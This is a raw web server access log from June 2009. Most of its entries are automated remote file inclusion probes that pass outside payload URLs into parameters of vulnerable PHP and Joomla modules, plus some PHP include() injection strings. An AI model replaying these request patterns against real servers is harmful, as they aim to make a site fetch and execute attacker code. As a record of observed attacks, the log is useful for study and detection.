203.94.155.59 - - [20/Jun/2009:01:16:54 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:16:57 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:16:57 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:16:57 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:17:03 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:17:05 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:17:08 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:17:08 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:17:08 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:17:15 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:17:17 -0400] "GET /include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:17:17 -0400] "GET /logs/include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:17:17 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:17:20 -0400] "GET /include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:17:20 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:01:17:20 -0400] "GET /logs/include/lib.inc.php?site_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:17:23 -0400] "GET /logs/access_log.Q109052300%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.101.192.223 - - [20/Jun/2009:01:17:37 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:01:17:37 -0400] "GET /errors.php?error=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:01:17:37 -0400] "GET /logs/errors.php?error=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
66.11.230.36 - - [20/Jun/2009:01:17:48 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:17:52 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:17:53 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:17:58 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:18:07 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:18:13 -0400] "GET /logs/access_log.Q109052200%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:18:14 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:18:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.101.192.223 - - [20/Jun/2009:01:19:43 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
195.64.174.74 - - [20/Jun/2009:01:20:24 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:01:21:07 -0400] "GET /logs/error_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
203.94.155.59 - - [20/Jun/2009:01:21:23 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:01:21:40 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:01:21:40 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:01:21:40 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:21:50 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6247 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:21:50 -0400] "GET /logs/access_log.Q109060800%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:21:57 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:22:13 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:22:25 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:22:27 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:22:27 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:22:29 -0400] "GET /logs/error_log.Q109060800%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:23:17 -0400] "GET /logs/error_log.Q109051900%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.70.83.4 - - [20/Jun/2009:01:23:38 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
202.70.83.4 - - [20/Jun/2009:01:23:38 -0400] "GET ///vwar/backup/errors.php?error=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
202.70.83.4 - - [20/Jun/2009:01:23:39 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
66.11.230.36 - - [20/Jun/2009:01:23:53 -0400] "GET /logs/error_log.Q109053000%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:23:53 -0400] "GET /logs/access_log.Q109053000%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:23:54 -0400] "GET /logs/error_log.Q109051000%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:23:59 -0400] "GET /logs/access_log.Q109051000%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:01:24:07 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.70.83.4 - - [20/Jun/2009:01:24:08 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.louangefm.fr//administrator/components/tirid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jun/2009:01:24:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.22.39 - - [20/Jun/2009:01:24:12 -0400] "GET /solpot.html?body=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:01:24:12 -0400] "GET /logs/solpot.html?body=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:01:24:12 -0400] "GET /logs/access_log.Q109060200%20%20/solpot.html?body=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:24:38 -0400] "GET /logs/error_log.Q109051400%20%20//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:24:45 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:24:45 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:01:24:45 -0400] "GET /logs/access_log.Q109060200/solpot.html?body=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:24:45 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:01:25:21 -0400] "GET /logs/access_log.Q109061400/solpot.html?body=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:01:25:31 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.1" 200 56583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.80.27 - - [20/Jun/2009:01:27:26 -0400] "GET /logs/access_log.Q109051700/main.php?x=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:27:26 -0400] "GET /main.php?x=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:27:26 -0400] "GET /logs/main.php?x=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:28:26 -0400] "GET /logs/access_log.Q109051700%20%20/main.php?x=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:28:45 -0400] "GET /logs/access_log.Q109060800//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:28:56 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:28:56 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:28:56 -0400] "GET /logs/access_log.Q109051100%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:01:28:57 -0400] "GET /logs/error_log.Q109051900//?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:28:59 -0400] "GET /logs/access_log.Q109060900%20%20/main.php?x=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:29:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.88.179.68 - - [20/Jun/2009:01:29:14 -0400] "GET /logs/access_log.Q109051100/modules/My_eGallery/index.php?basepath=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:01:29:15 -0400] "GET /modules/My_eGallery/index.php?basepath=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:01:29:15 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:01:29:18 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:01:29:18 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:01:29:19 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:01:29:27 -0400] "GET /logs/access_log.Q109052100/modules/My_eGallery/index.php?basepath=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
210.115.58.73 - - [20/Jun/2009:01:32:25 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:32:25 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:32:27 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:01:32:27 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.231.126.252 - - [20/Jun/2009:01:32:28 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:32:28 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:32:28 -0400] "GET /logs/error_log.Q109060300/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:32:47 -0400] "GET /logs/error_log.Q109060300/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:32:47 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
220.231.126.252 - - [20/Jun/2009:01:32:47 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
190.144.44.36 - - [20/Jun/2009:01:33:05 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:33:05 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:33:05 -0400] "GET /logs/access_log.Q109061300//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:33:05 -0400] "GET /logs/access_log.Q109051600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:33:52 -0400] "GET /logs/access_log.Q109051600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:34:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [20/Jun/2009:01:34:33 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:34:33 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:34:33 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.231.126.252 - - [20/Jun/2009:01:35:19 -0400] "GET /logs/access_log.Q109060300/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
222.122.160.145 - - [20/Jun/2009:01:35:26 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
124.217.216.86 - - [20/Jun/2009:01:35:42 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:01:35:42 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:01:35:42 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:01:35:42 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 213 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
190.144.44.36 - - [20/Jun/2009:01:35:43 -0400] "GET /logs/access_log.Q109061300%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:01:35:56 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
220.231.126.252 - - [20/Jun/2009:01:35:58 -0400] "GET /logs/access_log.Q109060300/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
190.144.44.36 - - [20/Jun/2009:01:35:59 -0400] "GET /logs/access_log.Q109052100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:36:15 -0400] "GET //include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:36:15 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.234.107.233 - - [20/Jun/2009:01:36:15 -0400] "GET /logs//include/footer.php?_path[counter]=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.144.44.36 - - [20/Jun/2009:01:36:22 -0400] "GET /logs/access_log.Q109060300%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.246.20.221 - - [20/Jun/2009:01:36:53 -0400] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.246.20.221 - - [20/Jun/2009:01:36:59 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.246.20.221 - - [20/Jun/2009:01:37:00 -0400] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
